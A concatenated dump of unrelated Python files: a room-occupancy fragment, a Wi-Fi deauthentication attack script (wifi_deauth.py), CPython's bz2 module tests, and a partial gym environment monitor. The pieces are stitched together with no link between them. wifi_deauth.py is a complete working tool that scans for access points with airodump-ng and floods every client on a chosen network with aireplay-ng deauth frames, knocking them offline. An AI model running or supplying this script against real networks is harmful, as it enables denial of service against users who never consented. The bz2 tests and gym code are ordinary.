Return the average amount of time
the room has spent occupied.
Gets information from logs.
'''
timeDiff = calcTimeDifference(query)
if len(timeDiff) != 0:
return sum(timeDiff, datetime.timedelta(0)) / len(timeDiff)
else:
return 0
return None
|
wifi_deauth.py
|
#!/usr/bin/python3
import csv
from datetime import datetime
import os
import re
import shutil
import subprocess
import threading
import time
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
result = subprocess.run(["iw", "dev"], capture_output = True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
subprocess.run(["ip", "link", "set", wifi_name, "down"])
subprocess.run(["airmon-ng", "check", "kill"])
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
elif choice == "1":
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
else:
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
directory = os.getcwd()
try:
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
timestamp = datetime.now()
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
if len(lst) == 0:
return check_status
for item in lst:
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
subprocess.call("clear", shell = True)
for file_name in os.listdir():
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames = fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
print(r"""__ _____ _____ ___
\ \ / /_ _| ___|_ _|
\ \ /\ / / | || |_ | |
\ V V / | || _| | |
\_/\_/ |___|_| |___|
____ _ _ _ _ _ _
| _ \ ___ / \ _ _| |_| |__ ___ _ __ | |_(_) ___ __ _| |_ ___ _ __
| | | |/ _ \ / _ \| | | | __| '_ \ / _ \ '_ \| __| |/ __/ _` | __/ _ \| '__|
| |_| | __// ___ \ |_| | |_| | | | __/ | | | |_| | (_| (_| | || (_) | |
|____/ \___/_/ \_\__,_|\__|_| |_|\___|_| |_|\__|_|\___\__,_|\__\___/|_|
______ _ ___ ______
/ / _ \ __| |/ _ \/ ___\ \
| || | | |/ _` | | | \___ \| |
| || |_| | (_| | |_| |___) | |
| ||____/ \__,_|\___/|____/| |
\_\ /_/
""")
print("\n****************************************************************")
print("\n* Created for learning purposes only ! *")
print("\n* https://github.com/rexdivakar/rexdivakar-Wifi-dDOS *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
macs_not_to_kick_off = list()
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
macs_not_to_kick_off = mac_address_regex.findall(macs)
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
network_controllers = find_nic()
if len(network_controllers) == 0:
print("Please connect a network interface controller and try again!")
exit()
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
wifi_name = network_controllers[int(controller_choice)]
set_monitor_mode(wifi_name)
set_band_to_monitor(band_choice)
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
get_clients(hackbssid, hackchannel, wifi_name)
active_clients = set()
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
subprocess.call("clear", shell = True)
for file_name in os.listdir():
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames = fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
print(f"{item}")
if item not in threads_started:
threads_started.append(item)
t = threading.Thread(target = deauth_attack, args = [hackbssid, item, wifi_name], daemon = True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
set_into_managed_mode(wifi_name)
|
test_bz2.py
|
from test import test_support
from test.test_support import TESTFN, _4G, bigmemtest, import_module, findfile
import unittest
from cStringIO import StringIO
import os
import subprocess
import sys
try:
import threading
except ImportError:
threading = None
bz2 = import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx", "riscos")
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT = 'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n'
DATA = 'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
DATA_CRLF = 'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 \x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80'
EMPTY_DATA = 'BZh9\x17rE8P\x90\x00\x00\x00\x00'
if has_cmdline_bunzip2:
def decompress(self, data):
pop = subprocess.Popen("bunzip2", shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pop.stdin.write(data)
pop.stdin.close()
ret = pop.stdout.read()
pop.stdout.close()
if pop.wait() != 0:
ret = bz2.decompress(data)
return ret
else:
# bunzip2 isn't available to run on Windows.
def decompress(self, data):
return bz2.decompress(data)
class BZ2FileTest(BaseTest):
"Test BZ2File type miscellaneous methods."
def setUp(self):
self.filename = TESTFN
def tearDown(self):
test_support.gc_collect()
if os.path.isfile(self.filename):
os.unlink(self.filename)
def createTempFile(self, crlf=0):
with open(self.filename, "wb") as f:
if crlf:
data = self.DATA_CRLF
else:
data = self.DATA
f.write(data)
def testRead(self):
# "Test BZ2File.read()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(), self.TEXT)
def testRead0(self):
# Test BBZ2File.read(0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(0), "")
def testReadChunk10(self):
# "Test BZ2File.read() in chunks of 10 bytes"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = ''
while 1:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testRead100(self):
# "Test BZ2File.read(100)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testReadLine(self):
# "Test BZ2File.readline()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
sio = StringIO(self.TEXT)
for line in sio.readlines():
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
# "Test BZ2File.readlines()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
sio = StringIO(self.TEXT)
self.assertEqual(bz2f.readlines(), sio.readlines())
def testIterator(self):
# "Test iter(BZ2File)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
sio = StringIO(self.TEXT)
self.assertEqual(list(iter(bz2f)), sio.readlines())
def testClosedIteratorDeadlock(self):
# "Test that iteration on a closed bz2file releases the lock."
# http://bugs.python.org/issue3309
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, bz2f.next)
# This call will deadlock of the above .next call failed to
# release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testXReadLines(self):
# "Test BZ2File.xreadlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(bz2f.xreadlines()), sio.readlines())
bz2f.close()
def testUniversalNewlinesLF(self):
# "Test BZ2File.read() with universal newlines (\\n)"
self.createTempFile()
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\n")
bz2f.close()
def testUniversalNewlinesCRLF(self):
# "Test BZ2File.read() with universal newlines (\\r\\n)"
self.createTempFile(crlf=1)
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\r\n")
bz2f.close()
def testWrite(self):
# "Test BZ2File.write()"
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
# "Test BZ2File.write() with chunks of 10 bytes"
with BZ2File(self.filename, "w") as bz2f:
n = 0
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteLines(self):
# "Test BZ2File.writelines()"
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
sio = StringIO(self.TEXT)
bz2f.writelines(sio.readlines())
# patch #1535500
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write("abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(IOError, bz2f.write, "a")
self.assertRaises(IOError, bz2f.writelines, ["a"])
def testSeekForward(self):
# "Test BZ2File.seek(150, 0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
# "Test BZ2File.seek(-150, 1)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsFromEnd(self):
# "Test BZ2File.seek(-150, 2)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekPostEnd(self):
# "Test BZ2File.seek(150000)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
def testSeekPostEndTwice(self):
# "Test BZ2File.seek(150000) twice"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
def testSeekPreStart(self):
# "Test BZ2File.seek(-150, 0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testOpenDel(self):
# "Test opening and deleting a file many times"
self.createTempFile()
for i in xrange(10000):
o = BZ2File(self.filename)
del o
if i % 100 == 0:
test_support.gc_collect()
def testOpenNonexistent(self):
# "Test opening a nonexistent file"
self.assertRaises(IOError, BZ2File, "/non/existent")
def testModeU(self):
# Bug #1194181: bz2.BZ2File opened for write with mode "U"
self.createTempFile()
bz2f = BZ2File(self.filename, "U")
bz2f.close()
f = file(self.filename)
f.seek(0, 2)
self.assertEqual(f.tell(), len(self.DATA))
f.close()
def testBug1191043(self):
# readlines() for files containing no newline
data = 'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, ['Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, ['Test'])
def testContextProtocol(self):
# BZ2File supports the context management protocol
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1 // 0
except ZeroDivisionError:
pass
else:
self.fail("1 // 0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Using a BZ2File from several threads doesn't deadlock (issue #7205).
data = "1" * 2**20
nthreads = 10
with bz2.BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
@test_support.impl_detail()
def testMixedIterationReads(self):
# Issue #8397: mixed iteration and reads should be forbidden.
with bz2.BZ2File(self.filename, 'wb') as f:
# The internal buffer size is hard-wired to 8192 bytes, we must
# write out more than that for the test to stop half through
# the buffer.
f.write(self.TEXT * 100)
with bz2.BZ2File(self.filename, 'rb') as f:
next(f)
self.assertRaises(ValueError, f.read)
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
@unittest.skipIf(sys.platform == 'win32',
'test depends on being able to delete a still-open file,'
' which is not possible on Windows')
def testInitNonExistentFile(self):
# Issue #19878: Should not segfault when __init__ with non-existent
# file for the second time.
self.createTempFile()
# Test close():
with BZ2File(self.filename, "wb") as f:
self.assertRaises(IOError, f.__init__, "non-existent-file")
# Test object deallocation without call to close():
f = bz2.BZ2File(self.filename)
self.assertRaises(IOError, f.__init__, "non-existent-file")
del f
class BZ2CompressorTest(BaseTest):
def testCompress(self):
# "Test BZ2Compressor.compress()/flush()"
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressEmptyString(self):
# "Test BZ2Compressor.compress()/flush() of empty string"
bz2c = BZ2Compressor()
data = bz2c.compress('')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
# "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes"
bz2c = BZ2Compressor()
n = 0
data = ''
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
@bigmemtest(_4G, memuse=1.25)
def testBigmem(self, size):
text = "a" * size
bz2c = bz2.BZ2Compressor()
data = bz2c.compress(text) + bz2c.flush()
del text
text = self.decompress(data)
self.assertEqual(len(text), size)
self.assertEqual(text.strip("a"), "")
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
# "Test BZ2Decompressor.decompress()"
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
# "Test BZ2Decompressor.decompress() with chunks of 10 bytes"
bz2d = BZ2Decompressor()
text = ''
n = 0
while 1:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
# "Test BZ2Decompressor.decompress() with unused data"
bz2d = BZ2Decompressor()
unused_data = "this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
# "Calling BZ2Decompressor.decompress() after EOS must raise EOFError"
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, "anything")
self.assertRaises(EOFError, bz2d.decompress, "")
@bigmemtest(_4G, memuse=1.25)
def testBigmem(self, size):
# Issue #14398: decompression fails when output data is >=2GB.
if size < _4G:
self.skipTest("Test needs 5GB of memory to run.")
compressed = bz2.compress("a" * _4G)
text = bz2.BZ2Decompressor().decompress(compressed)
self.assertEqual(len(text), _4G)
self.assertEqual(text.strip("a"), "")
class FuncTest(BaseTest):
"Test module functions"
def testCompress(self):
# "Test compress() function"
data = bz2.compress(self.TEXT)
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressEmptyString(self):
# "Test compress() of empty string"
text = bz2.compress('')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
# "Test decompress() function"
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
# "Test decompress() function with empty string"
text = bz2.decompress("")
self.assertEqual(text, "")
def testDecompressToEmptyString(self):
# "Test decompress() of minimal bz2 data to empty string"
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, '')
def testDecompressIncomplete(self):
# "Test decompress() function with incomplete data"
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
@bigmemtest(_4G, memuse=1.25)
def testCompressBigmem(self, size):
text = "a" * size
data = bz2.compress(text)
del text
text = self.decompress(data)
self.assertEqual(len(text), size)
self.assertEqual(text.strip("a"), "")
@bigmemtest(_4G, memuse=1.25)
def testDecompressBigmem(self, size):
# Issue #14398: decompression fails when output data is >=2GB.
if size < _4G:
self.skipTest("Test needs 5GB of memory to run.")
compressed = bz2.compress("a" * _4G)
text = bz2.decompress(compressed)
self.assertEqual(len(text), _4G)
self.assertEqual(text.strip("a"), "")
def test_main():
test_support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
FuncTest
)
test_support.reap_children()
if __name__ == '__main__':
test_main()
# vim:ts=4:sw=4
|
envs_utils.py
|
import os
from abc import ABC, abstractmethod
from collections import OrderedDict
import csv
import json
from multiprocessing import Process, Pipe
import time
current_dir = os.path.dirname(os.path.realpath(__file__))
parent_dir = os.path.dirname(current_dir)
os.sys.path.append(parent_dir)
import gym
from gym import spaces
from gym.core import Wrapper
import numpy as np
import torch
import environments
def make_env(env_id, seed, log_dir, **kwargs):
def _thunk():
env = gym.make(env_id, **kwargs)
env.seed(seed)
if str(env.__class__.__name__).find("TimeLimit") >= 0:
env = TimeLimitMask(env)
if log_dir is not None:
env = Monitor(env, log_dir, allow_early_resets=True)
return env
return _thunk
class TimeLimitMask(gym.Wrapper):
def step(self, action):
obs, rew, done, info = self.env.step(action)
if done and self.env._max_episode_steps == self.env._elapsed_steps:
info["bad_transition"] = True
return obs, rew, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class Monitor(Wrapper):
EXT = "monitor.csv"
f = None
def __init__(
self,
env,
filename,
allow_early_resets=False,
reset_keywords=(),
info_keywords=(),
):
Wrapper.__init__(self, env=env)
self.tstart = time.time()
if filename:
self.results_writer = ResultsWriter(
filename,
header={"t_start": time.time(), "env_id": env.spec and env.spec.id},
extra_keys=reset_keywords + info_keywords,
)
else:
self.results_writer = None
self.reset_keywords = reset_keywords
self.info_keywords = info_keywords
self.allow_early_resets = allow_early_resets
self.rewards = None
self.needs_reset = True
self.episode_rewards = []
self.episode_lengths = []
self.episode_times = []
self.total_steps = 0
self.current_reset_info = (
{}
) # extra info about the current episode, that was passed in during reset()
def reset(self, **kwargs):
self.reset_state()
for k in self.reset_keywords:
v = kwargs.get(k)
if v is None:
raise ValueError("Expected you to pass kwarg %s into reset" % k)
self.current_reset_info[k] = v
return self.env.reset(**kwargs)
def reset_state(self):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError(
"Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)"
)
self.rewards = []
if hasattr(self, "tensor_rewards"):
self.tensor_rewards.fill_(0)
self.needs_reset = False
def step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
ob, rew, done, info = self.env.step(action)
self.update(ob, rew, done, info)
return (ob, rew, done, info)
def update(self, ob, rew, done, info):
if isinstance(rew, torch.Tensor):
if not hasattr(self, "tensor_rewards"):
self.tensor_rewards = torch.zeros(rew.shape)
self.tensor_rewards.add_(rew.cpu())
self.rewards.append(float(rew.mean()))
else:
self.rewards.append(rew)
if done:
self.needs_reset = True
eprew = sum(self.rewards)
eplen = len(self.rewards)
epinfo = {
"r": round(eprew, 6),
"l": eplen,
"t": round(time.time() - self.tstart, 6),
}
for k in self.info_keywords:
epinfo[k] = info[k]
self.episode_rewards.append(eprew)
self.episode_lengths.append(eplen)
self.episode_times.append(time.time() - self.tstart)
epinfo.update(self.current_reset_info)
if self.results_writer:
self.results_writer.write_row(epinfo)
assert isinstance(info, dict)
if isinstance(info, dict):
info["episode"] = epinfo
if hasattr(self, "tensor_rewards"):
info["episode"]["mean"] = float(self.tensor_rewards.mean())
info["episode"]["median"] = float(self.tensor_rewards.median())
info["episode"]["min"] = float(self.tensor_rewards.min())
info["episode"]["max"] = float(self.tensor_rewards.max())
self.total_steps += 1
def close(self):
if self.f is not None:
self.f.close()
def get_total_steps(self):
return self.total_steps
def get_episode_rewards(self):
return self.episode_rewards
def get_episode_lengths(self):
return self.episode_lengths
def get_episode_times(self):
return self.episode_times
class ResultsWriter(object):
def __init__(self, filename, header="", extra_keys=()):
self.extra_keys = extra_keys
